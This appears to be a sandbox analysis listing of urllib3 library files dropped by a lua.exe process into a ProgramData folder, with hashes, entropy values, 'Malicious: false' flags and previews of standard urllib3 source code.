SHA-512:	8B0D0A12C749AA4F60FE816453E5B4B10D8ADFBD2DBF17A7548D3B05AB55E9DA180A6BCCF18754FF0FAA0FC3E159AB17FC322650AD4D63DCF08E3471AC4B7503
Malicious:	false
Preview:	# This file is protected via CODEOWNERS.__version__ = "1.26.2".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\connection.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18489
Entropy (8bit):	4.483544576595905
Encrypted:	false
SSDEEP:	384:gKTmcc0lKFJCtg6w6z1XDWXsxEbA8ClW8:9LlKFotg6LVp8W
MD5:	0751E405A934DE1D27D413643CA13016
SHA1:	65D3ED59E8F3827C29C11E5B289C1B4F54D74716
SHA-256:	83205512A4710BE28B98C92A1CA4920FC86E855E21AC25D6769A7CD55A450AE0
SHA-512:	E0E3A661D408A173F7C6A1E01FC1DA28311A8549A702739708BCC62FCC77CD23D69F42921D971D57DB84C4130C6281001438959F12165C2CE1812313E61BCE4D
Malicious:	false
Preview:	from __future__ import absolute_import..import datetime.import logging.import os.import re.import socket.import warnings.from socket import error as SocketError.from socket import timeout as SocketTimeout..from .packages import six.from .packages.six.moves.http_client import HTTPConnection as _HTTPConnection.from .packages.six.moves.http_client import HTTPException # noqa: F401.from .util.proxy import create_proxy_ssl_context..try: # Compiled with SSL?. import ssl.. BaseSSLError = ssl.SSLError.except (ImportError, AttributeError): # Platform-specific: No SSL.. ssl = None.. class BaseSSLError(BaseException):. pass...try:. # Python 3: not a no-op, we're adding this to the namespace so it can be imported.. ConnectionError = ConnectionError.except NameError:. # Python 2. class ConnectionError(Exception):. pass...try: # Python 3:. # Not a no-op, we're adding this to the namespace so it can be imported.. BrokenPipeError = BrokenPipeError.except

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\connectionpool.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	37133
Entropy (8bit):	4.306180746682064
Encrypted:	false
SSDEEP:	768:SWYeQ2AWEsTQZDVAT/35nM2mgQY5guR/yKFmY7:SWNQ2Acm5AT/xQuNFFmY7
MD5:	C8EEF2367F628C56029BF8E571E20097
SHA1:	F2028C30CAC783929BDFFF1A63A7F6EB1921BD23
SHA-256:	20AA1EB89658F580189B418AE2AF8C5C08725D6D0CFC59EF69B61A36C0C847E1
SHA-512:	E683127496A1BE498F51708323977434D8C62CC0BDA6B0D0D9B951E139DC2D5CA75764D92EC0F8A09A1D3F52A333A74701ED270C915B7895A7F2C5ACC8369B91
Malicious:	false
Preview:	from __future__ import absolute_import..import errno.import logging.import socket.import sys.import warnings.from socket import error as SocketError.from socket import timeout as SocketTimeout..from .connection import (. BaseSSLError,. BrokenPipeError,. DummyConnection,. HTTPConnection,. HTTPException,. HTTPSConnection,. VerifiedHTTPSConnection,. port_by_scheme,.).from .exceptions import (. ClosedPoolError,. EmptyPoolError,. HeaderParsingError,. HostChangedError,. InsecureRequestWarning,. LocationValueError,. MaxRetryError,. NewConnectionError,. ProtocolError,. ProxyError,. ReadTimeoutError,. SSLError,. TimeoutError,.).from .packages import six.from .packages.six.moves import queue.from .packages.ssl_match_hostname import CertificateError.from .request import RequestMethods.from .response import HTTPResponse.from .util.connection import is_connection_dropped.from .util.proxy import connection_requires_http_tunnel.from .util

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\contrib\_appengine_environ.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	957
Entropy (8bit):	4.839567597088071
Encrypted:	false
SSDEEP:	24:YelUQejhWpWovLFwInc1mOQny9FWvBnNI9hTLRKMLvLhTLRKMoBvLtaXP:AQejhWpvFwIQoynWvBu9hTk2hTk7pUXP
MD5:	ACC1A179E0EC7E6C78DDF8CA298AB6C2
SHA1:	C4CCCEC3D49682BA148AEEB6EBC8C9DC450C6A3C
SHA-256:	6C36F2384856D8228B25C42A00A032AC41CDF9A925B321C52AAEAF17C645B269
SHA-512:	A524C5CC746DA680F51071ECF610AAEF3AA4A58E169786C28B27D9961925461729357BE180D2D95ACC0E5B2C2456DD5D4DCE9276CC856717B5F478C9290C4732
Malicious:	false
Preview:	""".This module provides means to detect the App Engine environment.."""..import os...def is_appengine():. return is_local_appengine() or is_prod_appengine()...def is_appengine_sandbox():. """Reports if the app is running in the first generation sandbox... The second generation runtimes are technically still in a sandbox, but it. is much less restrictive, so generally you shouldn't need to check for it.. see https://cloud.google.com/appengine/docs/standard/runtimes. """. return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27"...def is_local_appengine():. return "APPENGINE_RUNTIME" in os.environ and os.environ.get(. "SERVER_SOFTWARE", "". ).startswith("Development/")...def is_prod_appengine():. return "APPENGINE_RUNTIME" in os.environ and os.environ.get(. "SERVER_SOFTWARE", "". ).startswith("Google App Engine/")...def is_prod_appengine_mvms():. """Deprecated.""". return False.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\contrib\_securetransport\bindings.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17637
Entropy (8bit):	5.132839867670083
Encrypted:	false
SSDEEP:	192:wu/LhugQHDxch4TH/WBO6VcdMFM4cF+V2AKkAK66qOQK+mx:1/91KxcyHuGGaW1V6hQD
MD5:	7E6E80ED107E3AD1A0416D22A31A2644
SHA1:	A59A0CFD5B81BB63EDADED0FB7FA52C1D41F4FE3
SHA-256:	135FFB49CB2039C85FC677A8CDB02E78AEF3882C05DF97E76B80EE0C2609F7FA
SHA-512:	BE271CC3B881E96793E4BD5F68EF0AFB8D404B4435CC66FECA0AAE83E10972B495BAB586D9725BFC91170CA4850BB43B0EC1FB128FE2405DDC2555BC443ED745
Malicious:	false
Preview:	""".This module uses ctypes to bind a whole bunch of functions and constants from.SecureTransport. The goal here is to provide the low-level API to.SecureTransport. These are essentially the C-level functions and constants, and.they're pretty gross to work with...This code is a bastardised version of the code found in Will Bond's oscrypto.library. An enormous debt is owed to him for blazing this trail for us. For.that reason, this code should be considered to be covered both by urllib3's.license and by oscrypto's:.. Copyright (c) 2015-2016 Will Bond <will@wbond.net>.. Permission is hereby granted, free of charge, to any person obtaining a. copy of this software and associated documentation files (the "Software"),. to deal in the Software without restriction, including without limitation. the rights to use, copy, modify, merge, publish, distribute, sublicense,. and/or sell copies of the Software, and to permit persons to whom the. Software is furnished to do so, sub

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\contrib\_securetransport\low_level.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13908
Entropy (8bit):	4.615552015977539
Encrypted:	false
SSDEEP:	384:4I5Kn8neLI5vX82J+KUHEgsm6eDhmaRwJtLTc+Wn6Jz4:angeLosKUHEgsm6eDhma/qE
MD5:	21AC8FE83494A2D87862C258011CBC9D
SHA1:	9A969EE66BDA1EDB61C306BC315ABF6BB3F08C89
SHA-256:	96021DB12C9CA9F0745E6E41889CD719E20A4FBC9B0903053C902091CC0F6B5B
SHA-512:	6D6D7D98DDEECDDE4F55177486C07A752AF969E0EF3BE746797936C3C9D1938437239FF12A7AF73CEE592DA60E074D3D98E99C016B1C1EDACF6635D3B543054C
Malicious:	false
Preview:	""".Low-level helpers for the SecureTransport bindings...These are Python functions that are not directly related to the high-level APIs.but are necessary to get them to work. They include a whole bunch of low-level.CoreFoundation messing about and memory management. The concerns in this module.are almost entirely about trying to avoid memory leaks and providing.appropriate and useful assistance to the higher-level code..""".import base64.import ctypes.import itertools.import os.import re.import ssl.import struct.import tempfile..from .bindings import CFConst, CoreFoundation, Security..# This regular expression is used to grab PEM data out of a PEM bundle.._PEM_CERTS_RE = re.compile(. b"-----BEGIN CERTIFICATE-----\n(.*?)\n-----END CERTIFICATE-----", re.DOTALL.)...def _cf_data_from_bytes(bytestring):. """. Given a bytestring, create a CFData object from it. This CFData object must. be CFReleased by the caller.. """. return CoreFoundation.CFDataCreate(. CoreFound

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\contrib\appengine.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11010
Entropy (8bit):	4.3981720587863276
Encrypted:	false
SSDEEP:	192:3v2ft8wfh2ACE7U/O0JCGs06jLNf3Wpn35NAbtJEGJab:/ct8wFn4JtnOh3Mn3Ou/b
MD5:	2B2BC512407D9EBE78F80FB7B9C1D7D0
SHA1:	C91BFBE803C89279012DBB206129BCF7B52F3545
SHA-256:	ECFC5BD2D29F0C1FCB4C63C4462B301F4AA89A10E85143A8E64C326C028B4321
SHA-512:	A42EBC9EDA24180C703BFCDA893F102688AC71BC736B4B7A5B89127553BF701D908FC1519E31573E5D81EEEE640B19354EB10295B2B39C947BE2E93674776AE0
Malicious:	false
Preview:	""".This module provides a pool manager that uses Google App Engine's.`URLFetch Service <https://cloud.google.com/appengine/docs/python/urlfetch>`_...Example usage::.. from urllib3 import PoolManager. from urllib3.contrib.appengine import AppEngineManager, is_appengine_sandbox.. if is_appengine_sandbox():. # AppEngineManager uses AppEngine's URLFetch API behind the scenes. http = AppEngineManager(). else:. # PoolManager uses a socket-level API behind the scenes. http = PoolManager().. r = http.request('GET', 'https://google.com/')..There are `limitations <https://cloud.google.com/appengine/docs/python/\.urlfetch/#Python_Quotas_and_limits>`_ to the URLFetch service and it may not be.the best choice for your application. There are three options for using.urllib3 on Google App Engine:..1. You can use :class:`AppEngineManager` with URLFetch. URLFetch is. cost-effective in many circumstances as long as your usage is within the. limitations..2.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\contrib\ntlmpool.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4160
Entropy (8bit):	4.5678462312510675
Encrypted:	false
SSDEEP:	48:bAeJ6bJawJ3iM46D90GLq8EokHylKuXPgHZ9Eq1eZwoChX9VJd5LF2FQskCqc9ct:su6bJzyMoN0roEZnstVnvohq5VKe2Fc
MD5:	1C75852AE7A1ADBBD0FA651DB7E6FD19
SHA1:	DD9DECB1DA1D1C5773A0DE48520BC13329302FD0
SHA-256:	E88F79875FFBD5FCF19A831236D634801F259F20A856D3FF0E9A851A3D787DD5
SHA-512:	105E0C239FE22F0325D42650BAA465D10939CF4029A25EE11738121753D22DEA450C57FECC02F8C29F3ECA0F9CFD4EFC8D798AAC59A75C9DC1ABCB6EE9D22448
Malicious:	false
Preview:	""".NTLM authenticating pool, contributed by erikcederstran..Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10.""".from __future__ import absolute_import..from logging import getLogger..from ntlm import ntlm..from .. import HTTPSConnectionPool.from ..packages.six.moves.http_client import HTTPSConnection..log = getLogger(__name__)...class NTLMConnectionPool(HTTPSConnectionPool):. """. Implements an NTLM authentication version of an urllib3 connection pool. """.. scheme = "https".. def __init__(self, user, pw, authurl, args, kwargs):. """. authurl is a random URL on the server that is protected by NTLM.. user is the Windows user, probably in the DOMAIN\\username format.. pw is the password for the user.. """. super(NTLMConnectionPool, self).__init__(args, **kwargs). self.authurl = authurl. self.rawuser = user. user_parts = user.split("\\", 1). self.domain = user_parts[0].upper().

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\contrib\pyopenssl.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16778
Entropy (8bit):	4.771547616488712
Encrypted:	false
SSDEEP:	192:uNP6MI33mikRJnFOkw+vZKZ783u12GWDUGI0iwZzGBrzPwW4QmkFlrl33hDYmD98:uNCn7kztw+vYhSukGUiwdtWxVpt72
MD5:	EC142A5B81EEC065DF3091CD74F21B9A
SHA1:	E581FB8FF6FE873D0E84D5D8B659C8C0A4BD534E
SHA-256:	BE087A8F9DB0F71830ABEDD1DA47C1E4CD896E54004C97CA00ADE52007359128
SHA-512:	C5B821224F7E7555AF7A035AF7885E0EC769ED9598BBE41A2A70C49742318111A121BB39A7D99B2965948BC9264D11AF84E55E0D6F38B663F955252205D4FD70
Malicious:	false
Preview:	""".TLS with SNI_-support for Python 2. Follow these instructions if you would.like to verify TLS certificates in Python 2. Note, the default libraries do.not do certificate checking; you need to do additional work to validate.certificates yourself...This needs the following packages installed:..* `pyOpenSSL`_ (tested with 16.0.0).* `cryptography`_ (minimum 1.3.4, from pyopenssl).* `idna`_ (minimum 2.0, from cryptography)..However, pyopenssl depends on cryptography, which depends on idna, so while we.use all three directly here we end up having relatively few packages required...You can install them with the following command:.... code-block:: bash.. $ python -m pip install pyopenssl cryptography idna..To activate certificate checking, call.:func:`~urllib3.contrib.pyopenssl.inject_into_urllib3` from your Python code.before you begin making HTTP requests. This can be done in a ``sitecustomize``.module, or at any other time before your application begins using ``urllib3``,.like this

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\contrib\securetransport.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	34286
Entropy (8bit):	4.6316192959955425
Encrypted:	false
SSDEEP:	768:cImrAW79SgjjHsC3tG3+Cfah4h4MS24vUw1IizY:cznc8c84CMS2CM
MD5:	10A6B3C0404C50AF30E9CD8278F480FF
SHA1:	4D34697108894349E2492C158ABE7FB3EA04A618
SHA-256:	2B118F664F1DE187A95A6ED173E481B755EBCC87E72CA73C26451557BE57CE01
SHA-512:	A4B75CD069F681FB97DE855697A68F6E76C09404BEFF6E35FB322A75F97B8830A0C9F196752986F84A8CA7FEA3B68492D68C36C3C277EF5D13D50E0BE8B1E16C
Malicious:	false
Preview:	""".SecureTranport support for urllib3 via ctypes...This makes platform-native TLS available to urllib3 users on macOS without the.use of a compiler. This is an important feature because the Python Package.Index is moving to become a TLSv1.2-or-higher server, and the default OpenSSL.that ships with macOS is not capable of doing TLSv1.2. The only way to resolve.this is to give macOS users an alternative solution to the problem, and that.solution is to use SecureTransport...We use ctypes here because this solution must not require a compiler. That's.because pip is not allowed to require a compiler either...This is not intended to be a seriously long-term solution to this problem..The hope is that PEP 543 will eventually solve this issue for us, at which.point we can retire this contrib module. But in the short term, we need to.solve the impending tire fire that is Python on Mac without this kind of.contrib module. So...here we are...To use this module, simply import and inject it::..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\contrib\socks.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7097
Entropy (8bit):	4.6112455657748965
Encrypted:	false
SSDEEP:	96:XojUEqJPKBdnuOSw/f2SxrrP611szEVkgJss:XVEqAjuOJ/f2SBrC11+EyMV
MD5:	C16975BD57EAFAD6B8F62D27288E3954
SHA1:	BB39C173E98D42B4F3E6597F21BAC457C5A479B5
SHA-256:	0DC463336974AD0308CA162B37AAFEB6756463A6530F11C994CF3FBAC0241820
SHA-512:	43E7DEB1594E160F0CE972D68CFB8D8E972BD51EADB89682685FDE86D0D30CB8A9C719FD06AB37D2CC5EAB3E1A295417E4EEA39C25D8C7F14378527AE19C24CD
Malicious:	false
Preview:	# -- coding: utf-8 --.""".This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recommended to use ``socks5h://`` or ``socks4a://`` schemes in. your ``proxy_url`` to ensure that DNS resolution is done from the remote. server instead of client-side when connecting to a domain name...SOCKS4 supports IPv4 and domain names with the SOCKS4A extension. SOCKS5.supports IPv4, IPv6, and domain names...When connecting to a

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\exceptions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7810
Entropy (8bit):	4.750644023592258
Encrypted:	false
SSDEEP:	96:e/1Sdu/Ds/a6sHyXNuvJ7q5jheEgHZWyj5cVPqCNIHtw6dov+K3x8fOVmmeHOVm6:ww/KfRWWHlcEC+H5dohvmmeHOVmucr8
MD5:	F848E11A3165F556727D827E992C4B29
SHA1:	D78BBE3C997DA7B441834AC4D3F34BB00406DCBE
SHA-256:	94DACA0B927CCDE05722EF5248A48D6FB70B8BC89797D011BBD0C70F649F9593
SHA-512:	B38B1702DF145DCC0DEA4F298FEA230286EF9CE368433F7EAB270529F38C4CEC112AAF299AFB5ECCDE90F69A606897FE286A01E40364F3400D005B2F28861D66
Malicious:	false
Preview:	from __future__ import absolute_import..from .packages.six.moves.http_client import IncompleteRead as httplib_IncompleteRead..# Base Exceptions...class HTTPError(Exception):. """Base exception used by this module.""".. pass...class HTTPWarning(Warning):. """Base warning used by this module.""".. pass...class PoolError(HTTPError):. """Base exception for errors caused within a pool.""".. def __init__(self, pool, message):. self.pool = pool. HTTPError.__init__(self, "%s: %s" % (pool, message)).. def __reduce__(self):. # For pickling purposes.. return self.__class__, (None, None)...class RequestError(PoolError):. """Base exception for PoolErrors that have associated URLs.""".. def __init__(self, pool, url, message):. self.url = url. PoolError.__init__(self, pool, message).. def __reduce__(self):. # For pickling purposes.. return self.__class__, (None, self.url, None)...class SSLError(HTTPError):. """Ra

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\fields.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8579
Entropy (8bit):	4.579166742309585
Encrypted:	false
SSDEEP:	192:nSikc2tLoIP2LRdjIZpN2m17t1KREMtcRG/T7mKBz:nSikJ5Pj+mOEg7mKBz
MD5:	93A2DC0508CF5901177F051F86D71C48
SHA1:	DFA65A499039A4D0FC62F81CE2B41A981C5E0B3E
SHA-256:	92F2C30A0FC9987D652E3514118FC52D2F14858EE106F0CFB951136D8F2676B3
SHA-512:	4BC02537AFD195D360E41DE7C712BE753F75AB79AC7D1FDDE53DEFFFCA15C9475CBC1D716408FFC05EDFDA38DAA8AEC1549AB73FB87B5156BDA278F31C061352
Malicious:	false
Preview:	from __future__ import absolute_import..import email.utils.import mimetypes.import re..from .packages import six...def guess_content_type(filename, default="application/octet-stream"):. """. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. """. if filename:. return mimetypes.guess_type(filename)[0] or default. return default...def format_header_param_rfc2231(name, value):. """. Helper function to format and quote a single header parameter using the. strategy defined in RFC 2231... Particularly useful for header parameters which might contain. non-ASCII values, like file names. This follows. `RFC 2388 Section 4.4 <https://tools.ietf.org/html/rfc2388#section-4.4>`_... :param name:. The name of the parameter, a string expected to be ASCII only.. :param value:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\filepost.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2440
Entropy (8bit):	4.639709442772028
Encrypted:	false
SSDEEP:	48:P5gfyQt55UqO+vYNqs72GZ4l6uhhCj29Bae/zNivW:ayi5FO+Hsxusuhhg2VYW
MD5:	2EA9F2FE3C06A4A560BC1DB53881D209
SHA1:	5D0F199CD76DC0C256C2F6C038DCA67E6B2C8374
SHA-256:	E5BFEAAA04475652FBB8BB5D018073061F861E653901F255B7FD8DD174B73DE6
SHA-512:	BA8BBF4AA0D859D1E74A730164D7345C4E8B393CE88C4646AEEE693A23DF933DB71BB4B0BD2A78F3D6A52AF7D04B79F2D7EABDEC34A83E362935DEEF9B06D857
Malicious:	false
Preview:	from __future__ import absolute_import..import binascii.import codecs.import os.from io import BytesIO..from .fields import RequestField.from .packages import six.from .packages.six import b..writer = codecs.lookup("utf-8")[3]...def choose_boundary():. """. Our embarrassingly-simple replacement for mimetools.choose_boundary.. """. boundary = binascii.hexlify(os.urandom(16)). if not six.PY2:. boundary = boundary.decode("ascii"). return boundary...def iter_field_objects(fields):. """. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... """. if isinstance(fields, dict):. i = six.iteritems(fields). else:. i = iter(fields).. for field in i:. if isinstance(field, RequestField):. yield field. else:. yield RequestField.from_tuples(*field)...def iter_fields(fields):. """. .. deprecated:: 1.6.. Iterate over fields... Th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\packages\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.27271868936365
Encrypted:	false
SSDEEP:	3:166MRm6NKXRGnHRz1YB3J6ILQRKvRMRFoNLEgQR3v:1RMABCRz163JjER0RMR6LEtR3v
MD5:	672889FC70A58564420F64D966E7ADC8
SHA1:	543E5DA816365A2E53EC0116B6B4A0208D386F71
SHA-256:	87804B843E2D2DA071D5A75A0ED2977EEA6C82A634C162D76FF7F5FF256557A0
SHA-512:	8AA7645286E61BFC585D23CC04D6718C7A68E8791D9CB2707068778C17D2D149AEF31CE84E2D404A792FDC81CC09843D957C8A2FC63BAF68BFEAB080E6237D4C
Malicious:	false
Preview:	from __future__ import absolute_import..from . import ssl_match_hostname..__all__ = ("ssl_match_hostname",).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\packages\backports\makefile.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1417
Entropy (8bit):	4.612780318160635
Encrypted:	false
SSDEEP:	24:ldryECFkyumlAs0C7a5JXrwszMd2kTiJar6CbDmlVLQ2LZLQHLQS1uH:ryEAQC7aPwsSTEarf3mly2SckuH
MD5:	D26B39C4287D4132D46935C8E0B2E169
SHA1:	DF04CDFC410623DE6479AF9FCB007388CFB9AA9E
SHA-256:	9DBCEDDE2D1A80F54FD3B8EAAA08E16988CC9AE022FD6E44D04CB0662BD53BC1
SHA-512:	0B1EBBA9DA250FF2CD7A3E6BCFF311DD1625D3BC0569463B5B6F549DB88361B9523C09DC67BDEFFE048BAB1E6E5DFC096BD5C8372D3EDE0D58D21372920326B7
Malicious:	false
Preview:	# -- coding: utf-8 --.""".backports.makefile.~~~~~~~~~~~~~~~~~~..Backports the Python 3 ``socket.makefile`` method for use with anything that.wants to create a "fake" socket object..""".import io.from socket import SocketIO...def backport_makefile(. self, mode="r", buffering=None, encoding=None, errors=None, newline=None.):. """. Backport of ``socket.makefile`` from Python 3.5.. """. if not set(mode) <= {"r", "w", "b"}:. raise ValueError("invalid mode %r (only r, w, b allowed)" % (mode,)). writing = "w" in mode. reading = "r" in mode or not writing. assert reading or writing. binary = "b" in mode. rawmode = "". if reading:. rawmode += "r". if writing:. rawmode += "w". raw = SocketIO(self, rawmode). self._makefile_refs += 1. if buffering is None:. buffering = -1. if buffering < 0:. buffering = io.DEFAULT_BUFFER_SIZE. if buffering == 0:. if not binary:. raise ValueError("unbuffered s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\packages\six.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	32536
Entropy (8bit):	4.776103357704882
Encrypted:	false
SSDEEP:	768:QSe9RWKbIy/SiYG8jll2rix9mlOD5sWdlY:JezWKbIy/Si78/d5nK
MD5:	48D4625A08131872536CF0A526AC9401
SHA1:	A2273B26BD09A6C6DC9FC76E3E1AFB1B2DE22484
SHA-256:	69DC78CFE78CFC3D15BEED0822A573140090FEEC7D97AE32EC391211F6F1083B
SHA-512:	5DE1D1A4F33083CE31456DAE74368A630221F720015E3A5729A84D72C31DFDEA5382AAE3E18ECC8ED2FFB208074CA6BE7A455502A63268051E9DD2429B00082B
Malicious:	false
Preview:	# Copyright (c) 2010-2019 Benjamin Peterson.#.# Permission is hereby granted, free of charge, to any person obtaining a copy.# of this software and associated documentation files (the "Software"), to deal.# in the Software without restriction, including without limitation the rights.# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the Software is.# furnished to do so, subject to the following conditions:.#.# The above copyright notice and this permission notice shall be included in all.# copies or substantial portions of the Software..#.# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISI

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\packages\ssl_match_hostname\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	757
Entropy (8bit):	4.408109226856155
Encrypted:	false
SSDEEP:	12:kyHriPIijxIOggnPm5CEqxB+xNRwKlTAbrRCzcHR+wYwRwwxB+xDZE3nR6Q/:kAWhBnPm5CEMiwKebrRBRLwWOZInMy
MD5:	AC3C579CD8FF6E5DFEC08DB3572BA8BC
SHA1:	C1CD0B4CE18F083CD23A3230E0C17FC1D96EBECB
SHA-256:	CE9A5ECDD1107691AC61EAC8EA657A31F518CB8F79255E2670E582FC681B9635
SHA-512:	C7C22411570126EEEC4C837DA5B1192BF8388E438195C6004B9BA23FE5C0E46A3C3AD5E095BA6E7F1DE4118BDB9BD2196ED1DF3587479350330347C35B43C049
Malicious:	false
Preview:	import sys..try:. # Our match_hostname function is the same as 3.5's, so we only want to. # import the match_hostname function if it's at least that good.. if sys.version_info < (3, 5):. raise ImportError("Fallback to vendored code").. from ssl import CertificateError, match_hostname.except ImportError:. try:. # Backport of the function from a pypi module. from backports.ssl_match_hostname import ( # type: ignore. CertificateError,. match_hostname,. ). except ImportError:. # Our vendored copy. from ._implementation import CertificateError, match_hostname # type: ignore..# Not needed, but documenting what we provide..__all__ = ("CertificateError", "match_hostname").

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\packages\ssl_match_hostname\_implementation.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5679
Entropy (8bit):	4.597342811905346
Encrypted:	false
SSDEEP:	96:qa5t+7RFp1bMziocVZn0QkWoS40Rrz8JPGH5tqLQ3IpdmcyHSup1eqtPZ:H5M/bbXB0QkWp40u4H4oIPmLyuCsB
MD5:	D22CD53DF77EC411CC8C0DFA98366ED8
SHA1:	B28A8B2F1DD772729A5D3303E2F1881AA1BC9C39
SHA-256:	E9D67EAB4EF883B5E1B09DBB3050A091CB7C895359077B0C66F2A17FE294572D
SHA-512:	F0A05809B61EC5F8240600129CC06C5D0DE8D7CEFB19EC7286DB34AB2E7C5F482DD2AC1AAB2C43E93F8B762C12CB9AB4D643980D95A182939C19704B227545CF
Malicious:	false
Preview:	"""The match_hostname() function from Python 3.3.3, essential when using SSL."""..# Note: This file is under the PSF license as the code comes from the python.# stdlib. http://docs.python.org/3/license.html..import re.import sys..# ipaddress has been backported to 2.6+ in pypi. If it is installed on the.# system, use it to handle IPAddress ServerAltnames (this was added in.# python-3.5) otherwise only do DNS matching. This allows.# backports.ssl_match_hostname to continue to be used in Python 2.7..try:. import ipaddress.except ImportError:. ipaddress = None..__version__ = "3.5.0.1"...class CertificateError(ValueError):. pass...def _dnsname_match(dn, hostname, max_wildcards=1):. """Matching according to RFC 6125, section 6.4.3.. http://tools.ietf.org/html/rfc6125#section-6.4.3. """. pats = []. if not dn:. return False.. # Ported from python3-syntax:. # leftmost, *remainder = dn.split(r'.'). parts = dn.split(r"."). leftmost = parts[0]. re

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\poolmanager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19763
Entropy (8bit):	4.580419830104235
Encrypted:	false
SSDEEP:	384:Ix0JL44vDADtd76mgTImAmTLmDgDZxp4Butv:ISLPADtd+FTIpSiKxpAutv
MD5:	299FABCF7E164A24F0E2DFF65612E271
SHA1:	18AE68E81AED5181CE9E32CF1DC9E3536C120B31
SHA-256:	C21CE55FA51312038330E0B2D190CC50E351042CF9C3220CF19F68A57018F8B9
SHA-512:	4AB9C4AF0BD304BE4734AD7C1AE87EB4FC1B7B14F0274E24C67F0FCC65170A257AE882913A8A2F1F10E9F1C37CE3DDB7715F9C1E174FBDF21951AED98EE2D7AE
Malicious:	false
Preview:	from __future__ import absolute_import..import collections.import functools.import logging..from ._collections import RecentlyUsedContainer.from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, port_by_scheme.from .exceptions import (. LocationValueError,. MaxRetryError,. ProxySchemeUnknown,. ProxySchemeUnsupported,. URLSchemeUnknown,.).from .packages import six.from .packages.six.moves.urllib.parse import urljoin.from .request import RequestMethods.from .util.proxy import connection_requires_http_tunnel.from .util.retry import Retry.from .util.url import parse_url..__all__ = ["PoolManager", "ProxyManager", "proxy_from_url"]...log = logging.getLogger(__name__)..SSL_KEYWORDS = (. "key_file",. "cert_file",. "cert_reqs",. "ca_certs",. "ssl_version",. "ca_cert_dir",. "ssl_context",. "key_password",.)..# All known keyword arguments that could be provided to the pool manager, its.# pools, or the underlying connections. This is used to con

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\request.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5985
Entropy (8bit):	4.441421608164705
Encrypted:	false
